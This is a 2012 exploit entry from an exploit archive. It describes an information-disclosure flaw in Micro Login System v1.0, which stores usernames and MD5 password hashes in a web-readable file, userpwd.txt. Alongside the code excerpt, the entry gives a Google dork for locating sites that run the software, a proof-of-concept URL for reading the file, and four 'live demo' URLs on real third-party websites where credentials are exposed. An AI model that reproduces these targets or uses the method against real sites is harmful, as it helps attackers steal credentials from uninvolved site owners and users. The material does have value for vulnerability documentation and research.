Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtDoSs-Dz1337DAY-ID-18307
HistoryMay 19, 2012 - 12:00 a.m.

Micro Login System v 1.0 Read password

2012-05-1900:00:00
DoSs-Dz
0day.today
3017
JSON

Exploit for php platform in category web applications

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0  [蒸 Site            : 1337day.com                                     0
1  [蒸 Support e-mail  : submit[@]1337day.com                            1
0                                                                        0
1               +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+                1
0               |I'm DoSs-Dz Member From Inj3ct0r Team  |                1
1               +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+                0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
+---------------------------------------------------------------------------------------------------+
|-> Author: DoSs-Dz                                                                                 |
|-> Exploit Title : Micro Login System v 1.0 Read password :)                                       |
|-> Vendor Site  : http://www.phptoys.com/downloads/microLoginSystem.zip                            |
|-> version : v1.0                                                                                  |
|-> Date : 18/05/12                                                                                 |
|-> Google Dork : intext:"Micro Login System v 1.0"                                                 |
+---------------------------------------------------------------------------------------------------+
1) Vuln in common.php in line 26 -> 30 : 

 Check user existance	
	$pfile = fopen("userpwd.txt","a+"); <----- Creat passwd fichier :) 
    rewind($pfile);

 If everything is OK -> store user data
    if ($errorText == ''){
		// Secure password string
		$userpass = md5($pass1);      <--- Hhhh Md5 :)
    	
		fwrite($pfile, "\r\n$user:$userpass");  <------ now you can see user and pass(md5) in userpwd.txt
		
    }
	
2) P0c : 
http://127.0.0.1/{path}/userpwd.txt (now you can see your user and pass :) )

3) Live Demo : 
http://www.bryceskiteam.org/userpwd.txt
http://www.licariautobodysupply.com/pricelist/userpwd.txt
http://www.showtimeny.com/userpwd.txt
http://www.iberconnectionpt.com/userpwd.txt 

+---------------------------------------------------------------------------------------------------+
|-> Spec!&l 10x 2 : Black-ID - Damane2011 - Robert Miles - BaC-Dz - Tn_Sploiter :)                  |
|-> Great'z : Sec4ever - is-sec.org - v4-team - vbspiders - all arab hack or security forum :)      |
|-> exploit-db.com - exploit4arab.com - 1337day.com                                                 |
+---------------------------------------------------------------------------------------------------+



#  0day.today [2018-03-19]  #
JSON